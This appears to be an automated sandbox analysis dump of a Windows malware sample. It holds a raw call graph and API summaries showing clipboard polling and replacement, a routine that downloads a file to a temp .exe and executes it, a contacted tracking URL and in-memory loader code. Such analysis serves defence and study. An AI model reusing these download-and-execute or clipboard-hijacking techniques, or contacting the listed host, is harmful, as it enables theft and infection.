43307a 64916->64921 64922 43305f 64916->64922 64976 42eac9 20 API calls __Wcscoll 64917->64976 64938 433029 __fread_nolock 64918->64938 64973 42ea93 20 API calls 2 library calls 64918->64973 64934 433250 64919->64934 64935 433267 64919->64935 64919->64938 64920->64919 64925 4331e3 GetLastError 64920->64925 64970 4347ee 64921->64970 64968 42eac9 20 API calls __Wcscoll 64922->64968 64925->64918 64926 43346a _free 20 API calls 64926->64887 64928 433064 64969 42eab6 20 API calls __Wcscoll 64928->64969 64929 433297 64977 42eab6 20 API calls __Wcscoll 64929->64977 64951 43d365 64930->64951 64974 432c45 31 API calls 3 library calls 64934->64974 64937 43327e 64935->64937 64935->64938 64975 432a85 29 API calls __fread_nolock 64937->64975 64938->64926 64940 433283 64940->64938 64941->64849 64942->64861 64943->64859 64944->64858 64945->64869 64946->64868 64947->64861 64948->64851 64949->64858 64950->64861 64952 43d372 64951->64952 64953 43d37f 64951->64953 64981 42eac9 20 API calls __Wcscoll 64952->64981 64955 43d38b 64953->64955 64982 42eac9 20 API calls __Wcscoll 64953->64982 64955->64908 64957 43d377 64957->64908 64958 43d3ac 64983 42a59d 26 API calls _Deallocate 64958->64983 64960->64881 64961->64887 64962->64891 64963->64890 64964->64899 64965->64904 64966->64938 64967->64903 64968->64928 64969->64938 64971 434755 __fread_nolock 28 API calls 64970->64971 64972 434804 64971->64972 64972->64930 64973->64938 64974->64938 64975->64940 64976->64929 64977->64938 64978->64885 64979->64890 64980->64887 64981->64957 64982->64958 64983->64957 64984 402bad RegCreateKeyExW 64985 402bdb RegSetValueExW 64984->64985 64986 402bef 64984->64986 64985->64986 64987 402bf4 RegCloseKey 64986->64987 64988 402bfd 64986->64988 64987->64988 64989 404b8e 64990 404b9a Concurrency::details::FairScheduleGroup::AllocateSegment 64989->64990 64995 40fb0c 64990->64995 64994 404bba ~ListArray Concurrency::details::FairScheduleGroup::AllocateSegment 64997 40fb11 64995->64997 64998 404ba3 64997->64998 65000 
40fb2d Concurrency::details::FairScheduleGroup::AllocateSegment 64997->65000 65019 42ad7e 64997->65019 65026 42f450 7 API calls 2 library calls 64997->65026 65003 4051d0 64998->65003 65027 42860d RaiseException 65000->65027 65002 4103cc 65004 4051dc __Cnd_init Concurrency::details::FairScheduleGroup::AllocateSegment 65003->65004 65006 4051f4 __Mtx_init 65004->65006 65038 40ce32 28 API calls std::_Throw_Cpp_error 65004->65038 65007 40521b 65006->65007 65039 40ce32 28 API calls std::_Throw_Cpp_error 65006->65039 65030 4010ea 65007->65030 65013 40526a 65015 40527f ~ListArray 65013->65015 65041 401128 30 API calls 2 library calls 65013->65041 65042 401109 65015->65042 65018 4052a4 Concurrency::details::FairScheduleGroup::AllocateSegment 65018->64994 65021 4336a7 std::_Locinfo::_Locinfo_ctor 65019->65021 65020 4336e5 65029 42eac9 20 API calls __Wcscoll 65020->65029 65021->65020 65023 4336d0 RtlAllocateHeap 65021->65023 65028 42f450 7 API calls 2 library calls 65021->65028 65023->65021 65024 4336e3 65023->65024 65024->64997 65026->64997 65027->65002 65028->65021 65029->65024 65046 40d313 65030->65046 65033 401103 65035 40cef3 65033->65035 65070 42e114 65035->65070 65038->65006 65039->65007 65040 40ce32 28 API calls std::_Throw_Cpp_error 65040->65013 65041->65013 65043 401115 __Mtx_unlock 65042->65043 65044 401122 65043->65044 65395 40ce32 28 API calls std::_Throw_Cpp_error 65043->65395 65044->65018 65050 40d06d 65046->65050 65049 40ce32 28 API calls std::_Throw_Cpp_error 65049->65033 65051 40d0c3 65050->65051 65052 40d095 GetCurrentThreadId 65050->65052 65053 40d0c7 GetCurrentThreadId 65051->65053 65054 40d0ed 65051->65054 65055 40d0a0 GetCurrentThreadId 65052->65055 65065 40d0bb 65052->65065 65057 40d0d6 65053->65057 65056 40d186 GetCurrentThreadId 65054->65056 65060 40d10d 65054->65060 65055->65065 65056->65057 65058 40d1dd GetCurrentThreadId 65057->65058 65057->65065 65058->65065 65059 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65061 4010f6 65059->65061 
65068 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65060->65068 65061->65033 65061->65049 65064 40d145 GetCurrentThreadId 65064->65057 65066 40d118 __Xtime_diff_to_millis2 65064->65066 65065->65059 65066->65057 65066->65064 65066->65065 65069 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65066->65069 65068->65066 65069->65066 65071 42e121 65070->65071 65072 42e135 65070->65072 65093 42eac9 20 API calls __Wcscoll 65071->65093 65084 42e0cb 65072->65084 65075 42e126 65094 42a59d 26 API calls _Deallocate 65075->65094 65078 42e14a CreateThread 65079 42e175 65078->65079 65080 42e169 GetLastError 65078->65080 65115 42dfc0 65078->65115 65096 42e03d 65079->65096 65095 42ea93 20 API calls 2 library calls 65080->65095 65081 405257 65081->65013 65081->65040 65104 434d2a 65084->65104 65087 43346a _free 20 API calls 65088 42e0e4 65087->65088 65089 42e103 65088->65089 65090 42e0eb GetModuleHandleExW 65088->65090 65091 42e03d __Thrd_start 22 API calls 65089->65091 65090->65089 65092 42e10d 65091->65092 65092->65078 65092->65079 65093->65075 65094->65081 65095->65079 65097 42e04a 65096->65097 65103 42e06e 65096->65103 65098 42e050 CloseHandle 65097->65098 65099 42e059 65097->65099 65098->65099 65100 42e068 65099->65100 65101 42e05f FreeLibrary 65099->65101 65102 43346a _free 20 API calls 65100->65102 65101->65100 65102->65103 65103->65081 65105 434d37 65104->65105 65106 434d77 65105->65106 65107 434d62 HeapAlloc 65105->65107 65112 434d4b std::_Locinfo::_Locinfo_ctor 65105->65112 65114 42eac9 20 API calls __Wcscoll 65106->65114 65108 434d75 65107->65108 65107->65112 65110 42e0db 65108->65110 65110->65087 65112->65106 65112->65107 65113 42f450 7 API calls 2 library calls 65112->65113 65113->65112 65114->65110 65116 42dfcc _Atexit 65115->65116 65117 42dfd3 GetLastError ExitThread 65116->65117 65118 42dfe0 65116->65118 65131 431eda GetLastError 65118->65131 65120 42dfe5 65151 435571 65120->65151 65124 42dffb 65158 401169 65124->65158 65132 431ef0 
65131->65132 65133 431ef6 65131->65133 65166 435111 11 API calls 2 library calls 65132->65166 65135 434d2a __Wcscoll 20 API calls 65133->65135 65137 431f45 SetLastError 65133->65137 65136 431f08 65135->65136 65138 431f10 65136->65138 65167 435167 11 API calls 2 library calls 65136->65167 65137->65120 65140 43346a _free 20 API calls 65138->65140 65142 431f16 65140->65142 65141 431f25 65141->65138 65143 431f2c 65141->65143 65145 431f51 SetLastError 65142->65145 65168 431d4c 20 API calls __Wcscoll 65143->65168 65169 42df7d 167 API calls 2 library calls 65145->65169 65146 431f37 65148 43346a _free 20 API calls 65146->65148 65150 431f3e 65148->65150 65149 431f5d 65150->65137 65150->65145 65152 435596 65151->65152 65153 43558c 65151->65153 65170 434e93 5 API calls 2 library calls 65152->65170 65155 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65153->65155 65156 42dff0 65155->65156 65156->65124 65165 4354a4 10 API calls 2 library calls 65156->65165 65157 4355ad 65157->65153 65171 405800 65158->65171 65184 40155a Sleep 65158->65184 65159 401173 65162 42e199 65159->65162 65363 42e074 65162->65363 65164 42e1a6 65165->65124 65166->65133 65167->65141 65168->65146 65169->65149 65170->65157 65172 40580c Concurrency::details::FairScheduleGroup::AllocateSegment 65171->65172 65173 4010ea std::_Cnd_initX 35 API calls 65172->65173 65174 405821 __Cnd_signal 65173->65174 65175 405839 65174->65175 65230 40ce32 28 API calls std::_Throw_Cpp_error 65174->65230 65177 401109 std::_Cnd_initX 28 API calls 65175->65177 65178 405842 65177->65178 65186 4029f4 InternetOpenW 65178->65186 65202 4016df 65178->65202 65181 405849 ~ListArray Concurrency::details::FairScheduleGroup::AllocateSegment 65181->65159 65185 4016d5 65184->65185 65187 402a27 InternetOpenUrlW 65186->65187 65188 402b9c 65186->65188 65187->65188 65189 402a3d GetTempPathW GetTempFileNameW 65187->65189 65190 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65188->65190 65231 42a88e 65189->65231 65193 402bab 65190->65193 
65223 40e76b 65193->65223 65194 402b8b InternetCloseHandle InternetCloseHandle 65194->65188 65195 402aa8 Concurrency::details::ResourceManager::DetermineTopology 65196 402ac0 InternetReadFile WriteFile 65195->65196 65197 402b00 CloseHandle 65195->65197 65196->65195 65233 402960 65197->65233 65200 402b2b ShellExecuteExW 65200->65194 65201 402b72 WaitForSingleObject CloseHandle 65200->65201 65201->65194 65341 40fde6 65202->65341 65204 4016eb Sleep 65342 40cc10 65204->65342 65207 40cc10 28 API calls 65208 401711 65207->65208 65209 40171b OpenClipboard 65208->65209 65210 401943 Sleep 65209->65210 65211 40172b GetClipboardData 65209->65211 65210->65209 65212 40173b GlobalLock 65211->65212 65213 40193d CloseClipboard 65211->65213 65212->65213 65217 401748 _strlen 65212->65217 65213->65210 65214 40cbc7 28 API calls std::system_error::system_error 65214->65217 65215 40cc10 28 API calls 65215->65217 65217->65213 65217->65214 65217->65215 65218 4018d2 EmptyClipboard GlobalAlloc 65217->65218 65346 402e66 167 API calls 2 library calls 65217->65346 65348 40caa6 26 API calls _Deallocate 65217->65348 65218->65217 65220 4018eb GlobalLock 65218->65220 65347 426990 65220->65347 65222 401905 GlobalUnlock SetClipboardData GlobalFree 65222->65217 65354 40deea 65223->65354 65228 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65361 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65228->65361 65229 40e810 65229->65181 65230->65175 65232 402a76 CreateFileW 65231->65232 65232->65194 65232->65195 65234 40298b _wcslen Concurrency::details::ResourceManager::DetermineTopology 65233->65234 65243 42b454 65234->65243 65238 4029b8 65265 404333 65238->65265 65241 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65242 4029f2 65241->65242 65242->65194 65242->65200 65269 42b106 65243->65269 65246 402823 65247 402832 Concurrency::details::FairScheduleGroup::AllocateSegment 65246->65247 65295 4032dd 65247->65295 65249 402846 65311 403b8b 65249->65311 65251 40285a 65252 
402888 65251->65252 65253 40286c 65251->65253 65317 403112 65252->65317 65338 40329a 167 API calls 65253->65338 65256 402895 65320 403c20 65256->65320 65258 4028a7 65330 403cc2 65258->65330 65260 40287f std::ios_base::_Ios_base_dtor Concurrency::details::FairScheduleGroup::AllocateSegment 65260->65238 65261 4028c4 65262 404333 26 API calls 65261->65262 65263 4028e3 65262->65263 65339 40329a 167 API calls 65263->65339 65266 4029e4 65265->65266 65267 40433b 65265->65267 65266->65241 65340 40cc96 26 API calls 2 library calls 65267->65340 65270 42b133 65269->65270 65271 42b142 65270->65271 65272 42b15a 65270->65272 65283 42b137 65270->65283 65273 42eac9 __Wcscoll 20 API calls 65271->65273 65274 42a747 __fassign 162 API calls 65272->65274 65275 42b147 65273->65275 65277 42b165 65274->65277 65278 42a59d __Thrd_start 26 API calls 65275->65278 65276 40f8cf __ExceptionPtr::_RethrowException 5 API calls 65279 4029a4 65276->65279 65280 42b170 65277->65280 65281 42b307 65277->65281 65278->65283 65279->65246 65285 42b218 WideCharToMultiByte 65280->65285 65288 42b17b 65280->65288 65291 42b1b5 WideCharToMultiByte 65280->65291 65282 42b334 WideCharToMultiByte 65281->65282 65284 42b312 65281->65284 65282->65284 65283->65276 65284->65283 65287 42eac9 __Wcscoll 20 API calls 65284->65287 65285->65288 65289 42b243 65285->65289 65287->65283 65288->65283 65292 42eac9 __Wcscoll 20 API calls 65288->65292 65289->65288 65290 42b24c GetLastError 65289->65290 65290->65288 65294 42b25b 65290->65294 65291->65288 65292->65283 65293 42b274 WideCharToMultiByte 65293->65284 65293->65294 65294->65283 65294->65284 65294->65293 65296 4032e9 Concurrency::details::FairScheduleGroup::AllocateSegment 65295->65296 65297 40467c 167 API calls 65296->65297 65298 403315 65297->65298 65299 40484d 167 API calls 65298->65299 65300 40333e 65299->65300 65301 40458c 26 API calls 65300->65301 65302 40334d 65301->65302 65303 40dde3 167 API calls 65302->65303 65304 403392 std::ios_base::_Ios_base_dtor 65302->65304 65306 
403362 65303->65306 65305 4033ce Concurrency::details::FairScheduleGroup::AllocateSegment 65304->65305 65307 40c618 167 API calls 65304->65307 65305->65249 65306->65304 65308 40458c 26 API calls 65306->65308 65307->65305 65309 403373 65308->65309 65310 404c14 167 API calls 65309->65310 65310->65304 65312 403b97 Concurrency::details::FairScheduleGroup::AllocateSegment 65311->65312 65313 4042af 167 API calls 65312->65313 65314 403ba3 65313->65314 65315 403bc7 Concurrency::details::FairScheduleGroup::AllocateSegment 65314->65315 65316 4034fb 167 API calls 65314->65316 65315->65251 65316->65315 65318 404356 28 API calls 65317->65318 65319 40312c Concurrency::details::ResourceManager::DetermineTopology 65318->65319 65319->65256 65321 403c2c Concurrency::details::FairScheduleGroup::AllocateSegment 65320->65321 65322 40c618 167 API calls 65321->65322 65323 403c4f 65322->65323 65324 4042af 167 API calls 65323->65324 65325 403c59 65324->65325 65327 403c9c Concurrency::details::FairScheduleGroup::AllocateSegment 65325->65327 65329 4034fb 167 API calls 65325->65329 65326 403c7a 65326->65327 65328 4046ca 167 API calls 65326->65328 65327->65258 65328->65327 65329->65326 65331 403cce __EH_prolog3_catch 65330->65331 65332 4042af 167 API calls 65331->65332 65334 403ce7 65332->65334 65333 4046ca 167 API calls 65336 403d70 Concurrency::details::FairScheduleGroup::AllocateSegment 65333->65336 65335 403d17 65334->65335 65337 40369f 40 API calls 65334->65337 65335->65333 65336->65261 65337->65335 65338->65260 65339->65260 65340->65266 65341->65204 65343 40cc2c _strlen 65342->65343 65349 40cbc7 65343->65349 65345 401704 65345->65207 65346->65217 65347->65222 65348->65217 65350 40cbfa 65349->65350 65351 40cbd6 BuildCatchObjectHelperInternal 65349->65351 65350->65351 65353 40cb5c 28 API calls 4 library calls 65350->65353 65351->65345 65353->65351 65362 40f22a EnterCriticalSection 65354->65362 65356 40def4 65357 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 
65356->65357 65358 40ced2 65357->65358 65359 40cec7 CloseHandle 65357->65359 65360 40ced6 GetCurrentThreadId 65358->65360 65359->65360 65360->65228 65361->65229 65362->65356 65372 431f5e GetLastError 65363->65372 65365 42e083 ExitThread 65366 42e0a1 65369 42e0ad CloseHandle 65366->65369 65370 42e0b4 65366->65370 65369->65370 65370->65365 65371 42e0c0 FreeLibraryAndExitThread 65370->65371 65373 431f7d 65372->65373 65374 431f77 65372->65374 65376 434d2a __Wcscoll 17 API calls 65373->65376 65377 431fd4 SetLastError 65373->65377 65392 435111 11 API calls 2 library calls 65374->65392 65378 431f8f 65376->65378 65380 42e07f 65377->65380 65379 431f97 65378->65379 65393 435167 11 API calls 2 library calls 65378->65393 65382 43346a _free 17 API calls 65379->65382 65380->65365 65380->65366 65391 4354f6 10 API calls 2 library calls 65380->65391 65384 431f9d 65382->65384 65383 431fac 65383->65379 65385 431fb3 65383->65385 65387 431fcb SetLastError 65384->65387 65394 431d4c 20 API calls __Wcscoll 65385->65394 65387->65380 65388 431fbe 65389 43346a _free 17 API calls 65388->65389 65390 431fc4 65389->65390 65390->65377 65390->65387 65391->65366 65392->65373 65393->65383 65394->65388 65395->65044 65396 40239e 65397 402561 PostQuitMessage 65396->65397 65398 4023b2 65396->65398 65399 40255f 65397->65399 65400 4023b9 DefWindowProcW 65398->65400 65401 4023d0 65398->65401 65400->65399 65401->65399 65402 4029f4 167 API calls 65401->65402 65402->65399

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 004016E6
• Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
• OpenClipboard.USER32(00000000), ref: 0040171D
• GetClipboardData.USER32(00000001), ref: 0040172D
• GlobalLock.KERNEL32(00000000), ref: 0040173C
• _strlen.LIBCMT ref: 00401749
• _strlen.LIBCMT ref: 00401778
• _strlen.LIBCMT ref: 004018BC
• EmptyClipboard.USER32 ref: 004018D2
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
• GlobalLock.KERNEL32(00000000), ref: 004018FD
• GlobalUnlock.KERNEL32(00000000), ref: 00401909
• SetClipboardData.USER32(00000001,00000000), ref: 00401912
• GlobalFree.KERNEL32(00000000), ref: 00401919
• CloseClipboard.USER32 ref: 0040193D
• Sleep.KERNEL32(000002D2), ref: 00401948
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
                                                                                                                                                                                                                                            • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                            • String ID: i
                                                                                                                                                                                                                                            • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                            • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                            • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                            • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                            • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                            • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                            • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00B0A2F6
                                                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00B0A316
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_b09000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3833638111-0
                                                                                                                                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                            • Instruction ID: 5e29aac8477b810b8172aa99dd5f6e002ea8b7c190f2ae1f61257ecf6ef6b7da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF09632200711ABD7203BF5988DFAEBAE8EF49725F100979E642D14C0DB74EC454A66

Control-flow Graph (function at 0043D03C; rendered graph not included in this text)
APIs
• Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
• GetLastError.KERNEL32 ref: 0043D150
• __dosmaperr.LIBCMT ref: 0043D157
• GetFileType.KERNEL32(00000000), ref: 0043D163
• GetLastError.KERNEL32 ref: 0043D16D
• __dosmaperr.LIBCMT ref: 0043D176
• CloseHandle.KERNEL32(00000000), ref: 0043D196
• CloseHandle.KERNEL32(?), ref: 0043D2E0
• GetLastError.KERNEL32 ref: 0043D312
• __dosmaperr.LIBCMT ref: 0043D319
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
• Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Control-flow Graph (function at 00432F29; rendered graph not included in this text)
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
• Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Control-flow Graph
(control_flow_graph 250, basic blocks 0x249003c-0x249091d; blocks calling VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA; rendered graph and executed/not-executed legend omitted)
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0249024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14

Control-flow Graph
APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
• InternetCloseHandle.WININET(00000000), ref: 00402E4B
• InternetCloseHandle.WININET(00000000), ref: 00402E4E
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Internet$CloseHandleOpen_wcslen
• String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3067768807-1501832161
• Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
• Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
• Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
• Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
• Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
• Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Control-flow Graph
APIs
• std::_Cnd_initX.LIBCPMT ref: 0040581C
• __Cnd_signal.LIBCPMT ref: 00405828
• std::_Cnd_initX.LIBCPMT ref: 0040583D
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
• Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Control-flow Graph
APIs
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
• ExitThread.KERNEL32 ref: 0042DFDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID: F(@
• API String ID: 1611280651-2698495834
• Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
• Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Control-flow Graph
(control_flow_graph 435, basic blocks 0x42e114-0x42e197; blocks calling CreateThread and GetLastError; rendered graph and executed/not-executed legend omitted)
APIs
• CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
• GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
• __dosmaperr.LIBCMT ref: 0042E170
Memory Dump Source
